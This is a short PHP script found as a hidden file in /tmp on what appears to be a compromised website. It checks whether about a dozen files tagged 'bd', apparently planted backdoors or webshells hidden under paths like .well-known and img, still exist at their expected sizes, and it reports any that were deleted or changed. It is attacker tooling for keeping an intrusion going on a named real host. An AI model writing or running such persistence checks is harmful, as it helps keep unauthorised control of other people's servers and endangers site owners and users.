File: //tmp/.record
<?php $r = '/home/vitanhod/trimate2.vitavit.com.pk'; $x = ["/includes/config.php"=>"bd@@1279685@@31",
"/.well-known/XHTML.php"=>"bd@@1269625@@894",
"/orderemail_bk.php"=>"bd@@1279475@@86",
"/orderemail.php"=>"bd@@1279640@@46",
"/toolbar.trash.php"=>"bd@@1279527@@48",
"/img/ma_show.php"=>"bd@@1279591@@77",
"/includes/cma_m_mailprefs.php"=>"bd@@1269505@@852",
"/img/ma_show.php"=>"bd@@1268513@@972",
"/toolbar.trash.php"=>"bd@@1269571@@1073",
"/.well-known/pki-validation/Filesystem.php"=>"bd@@1269598@@905",
"/includes/cma.php"=>"bd@@1309808@@874"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');